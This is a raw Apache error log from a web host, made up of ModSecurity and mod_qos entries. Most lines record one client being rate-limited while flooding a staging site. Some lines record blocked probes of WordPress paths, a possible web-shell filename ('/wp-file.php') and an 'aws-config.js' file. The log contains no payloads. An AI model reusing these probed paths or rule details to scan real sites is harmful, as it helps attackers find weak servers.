[Tue May 26 20:00:25.354809 2026] [security2:error] [pid 106517:tid 106756] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1e-gAAAO4"]
[Tue May 26 20:00:25.361363 2026] [security2:error] [pid 93576:tid 93739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCfwAAABs"]
[Tue May 26 20:00:25.366395 2026] [security2:error] [pid 106517:tid 106659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1e7QAAAI4"]
[Tue May 26 20:00:25.367851 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCaQAAAG4"]
[Tue May 26 20:00:25.375680 2026] [security2:error] [pid 106517:tid 106728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1fEwAAANI"]
[Tue May 26 20:00:25.383970 2026] [security2:error] [pid 93576:tid 93773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCZAAAAD0"]
[Tue May 26 20:00:25.385688 2026] [security2:error] [pid 106517:tid 106765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1e7AAAAPc"]
[Tue May 26 20:00:25.387778 2026] [security2:error] [pid 93576:tid 93788] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCaAAAAEw"]
[Tue May 26 20:00:25.396706 2026] [security2:error] [pid 93576:tid 93714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCcAAAAAI"]
[Tue May 26 20:00:25.406848 2026] [security2:error] [pid 93576:tid 93814] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCbgAAAGY"]
[Tue May 26 20:00:25.406983 2026] [security2:error] [pid 106517:tid 106676] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1fEQAAAJ8"]
[Tue May 26 20:00:25.421242 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCiAAAACc"]
[Tue May 26 20:00:25.427157 2026] [security2:error] [pid 93576:tid 93836] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCiQAAAHw"]
[Tue May 26 20:00:25.430540 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCkAAAADo"]
[Tue May 26 20:00:25.430709 2026] [security2:error] [pid 93576:tid 93774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCjwAAAD4"]
[Tue May 26 20:00:25.440119 2026] [security2:error] [pid 93576:tid 93761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCiwAAADE"]
[Tue May 26 20:00:25.476907 2026] [security2:error] [pid 93576:tid 93754] [client 103.163.220.46:50041] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/Requests/src/Exception/Transport/"] [unique_id "ahWugWDRMqfxdEDkoswC3wAAACo"]
[Tue May 26 20:00:25.551881 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDCwAAABU
[Tue May 26 20:00:25.557492 2026] [qos:error] [pid 106517:tid 106773] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugYZZc2DoU1lPnP1fhAAAAP8
[Tue May 26 20:00:25.562095 2026] [qos:error] [pid 93576:tid 93777] [client 45.148.10.120:58114] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDDAAAAEE
[Tue May 26 20:00:25.562445 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDDQAAACQ
[Tue May 26 20:00:25.622423 2026] [security2:error] [pid 93576:tid 93798] [client 114.119.157.37:22955] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/products/terra-serena-rose-prosecco"] [unique_id "ahWugWDRMqfxdEDkoswDEQAAAFY"], referer: http://haddingtonwines.com/products/terra-serena-rose-prosecco/
[Tue May 26 20:00:25.640684 2026] [qos:error] [pid 93576:tid 93815] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDEwAAAGc
[Tue May 26 20:00:25.640849 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDFAAAABY
[Tue May 26 20:00:25.641518 2026] [security2:error] [pid 93576:tid 93829] [client 46.8.110.122:44535] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "46.8.110.122" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWugWDRMqfxdEDkoswC0wAAAHU"], referer: https://anujtradingco.com
[Tue May 26 20:00:25.642056 2026] [qos:error] [pid 106517:tid 106652] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugYZZc2DoU1lPnP1figAAAIc
[Tue May 26 20:00:25.642709 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:57956] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDFQAAACU
[Tue May 26 20:00:25.644678 2026] [qos:error] [pid 106517:tid 106711] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugYZZc2DoU1lPnP1fiwAAAME
[Tue May 26 20:00:25.699979 2026] [qos:error] [pid 93576:tid 93813] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDGAAAAGU
[Tue May 26 20:00:25.711879 2026] [qos:error] [pid 106517:tid 106659] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugYZZc2DoU1lPnP1fjgAAAI4
[Tue May 26 20:00:25.716154 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:58114] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDGQAAAAg
[Tue May 26 20:00:25.716815 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDGgAAAAg
[Tue May 26 20:00:25.785673 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:53524] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDGwAAAGo
[Tue May 26 20:00:25.788888 2026] [qos:error] [pid 93576:tid 93740] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDHAAAABw
[Tue May 26 20:00:25.791071 2026] [qos:error] [pid 93576:tid 93780] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDHQAAAEQ
[Tue May 26 20:00:25.792415 2026] [qos:error] [pid 106517:tid 106657] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugYZZc2DoU1lPnP1fkgAAAIw
[Tue May 26 20:00:25.793996 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:57956] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDHgAAAG8
[Tue May 26 20:00:25.796053 2026] [qos:error] [pid 106517:tid 106765] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugYZZc2DoU1lPnP1flAAAAPc
[Tue May 26 20:00:25.828855 2026] [security2:error] [pid 106517:tid 106729] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahWugYZZc2DoU1lPnP1fkwAA0x4"]
[Tue May 26 20:00:25.853268 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDIAAAAGM
[Tue May 26 20:00:25.866154 2026] [qos:error] [pid 106517:tid 106677] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugYZZc2DoU1lPnP1fmgAAAKA
[Tue May 26 20:00:25.870927 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:58114] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDIQAAACo
[Tue May 26 20:00:25.871370 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDIgAAAGs
[Tue May 26 20:00:25.890522 2026] [security2:error] [pid 93576:tid 93758] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswC1gAAAC4"]
[Tue May 26 20:00:25.933478 2026] [qos:error] [pid 93576:tid 93777] [client 45.148.10.120:53524] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDJQAAAEE
[Tue May 26 20:00:25.937339 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDJgAAACQ
[Tue May 26 20:00:25.940814 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDJwAAAFY
[Tue May 26 20:00:25.941986 2026] [qos:error] [pid 106517:tid 106649] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugYZZc2DoU1lPnP1fowAAAIU
[Tue May 26 20:00:25.947382 2026] [qos:error] [pid 106517:tid 106716] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugYZZc2DoU1lPnP1fpAAAAMY
[Tue May 26 20:00:25.951606 2026] [qos:error] [pid 93576:tid 93772] [client 45.148.10.120:57956] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugWDRMqfxdEDkoswDKAAAADw
[Tue May 26 20:00:25.994732 2026] [security2:error] [pid 93576:tid 93716] [client 103.163.220.39:39441] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-file.php"] [unique_id "ahWugWDRMqfxdEDkoswDKQAAAAQ"]
[Tue May 26 20:00:26.001713 2026] [qos:error] [pid 93576:tid 93817] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugmDRMqfxdEDkoswDKgAAAGk
[Tue May 26 20:00:26.020464 2026] [qos:error] [pid 106517:tid 106773] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugoZZc2DoU1lPnP1fpgAAAP8
[Tue May 26 20:00:26.024841 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:58114] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugmDRMqfxdEDkoswDKwAAACU
[Tue May 26 20:00:26.025920 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugmDRMqfxdEDkoswDLAAAADo
[Tue May 26 20:00:26.081027 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:53524] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugmDRMqfxdEDkoswDLgAAAAg
[Tue May 26 20:00:26.085335 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugmDRMqfxdEDkoswDLwAAAAo
[Tue May 26 20:00:26.090942 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugmDRMqfxdEDkoswDMAAAAEs
[Tue May 26 20:00:26.092322 2026] [qos:error] [pid 106517:tid 106737] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugoZZc2DoU1lPnP1frAAAANs
[Tue May 26 20:00:26.099145 2026] [qos:error] [pid 106517:tid 106754] [client 45.148.10.120:58098] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugoZZc2DoU1lPnP1frQAAAOw
[Tue May 26 20:00:26.103006 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:57956] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugmDRMqfxdEDkoswDMQAAAGo
[Tue May 26 20:00:26.285318 2026] [security2:error] [pid 93576:tid 93726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCjQAAAA4"]
[Tue May 26 20:00:26.287485 2026] [security2:error] [pid 106517:tid 106674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1fEgAAAJ0"]
[Tue May 26 20:00:26.295032 2026] [security2:error] [pid 93576:tid 93832] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCkwAAAHg"]
[Tue May 26 20:00:26.296097 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCmAAAAA8"]
[Tue May 26 20:00:26.296943 2026] [security2:error] [pid 93576:tid 93728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCjAAAABA"]
[Tue May 26 20:00:26.303050 2026] [security2:error] [pid 93576:tid 93825] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCkgAAAHE"]
[Tue May 26 20:00:26.314642 2026] [security2:error] [pid 106517:tid 106775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1fHQAAAQE"]
[Tue May 26 20:00:26.318989 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCkQAAAEY"]
[Tue May 26 20:00:26.322247 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCoAAAACI"]
[Tue May 26 20:00:26.329125 2026] [security2:error] [pid 93576:tid 93751] [client 74.103.208.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWugWDRMqfxdEDkoswDIwAAACc"]
[Tue May 26 20:00:26.330567 2026] [security2:error] [pid 106517:tid 106731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugYZZc2DoU1lPnP1fWwAAANU"]
[Tue May 26 20:00:26.337923 2026] [security2:error] [pid 106517:tid 106699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1fHwAAALU"]
[Tue May 26 20:00:26.339922 2026] [security2:error] [pid 106517:tid 106748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1fHgAAAOY"]
[Tue May 26 20:00:26.342485 2026] [security2:error] [pid 106517:tid 106690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1fJwAAAKw"]
[Tue May 26 20:00:26.355016 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCngAAAFI"]
[Tue May 26 20:00:26.361420 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1fKQAAALM"]
[Tue May 26 20:00:26.362871 2026] [security2:error] [pid 93576:tid 93786] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCoQAAAEo"]
[Tue May 26 20:00:26.371815 2026] [security2:error] [pid 93576:tid 93816] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCpQAAAGg"]
[Tue May 26 20:00:26.371845 2026] [security2:error] [pid 93576:tid 93783] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswCqQAAAEc"]
[Tue May 26 20:00:26.379266 2026] [security2:error] [pid 106517:tid 106777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugIZZc2DoU1lPnP1fJQAAAQM"]
[Tue May 26 20:00:26.396914 2026] [security2:error] [pid 93576:tid 93732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugGDRMqfxdEDkoswClQAAABQ"]
[Tue May 26 20:00:26.398566 2026] [security2:error] [pid 93576:tid 93833] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWugmDRMqfxdEDkoswDOAAAeQw"], referer: https://www.ndequipments.com/aws-config.js
[Tue May 26 20:00:26.403924 2026] [security2:error] [pid 106517:tid 106746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugYZZc2DoU1lPnP1fWgAAAOQ"]
[Tue May 26 20:00:26.406748 2026] [security2:error] [pid 106517:tid 106752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugYZZc2DoU1lPnP1fZQAAAOo"]
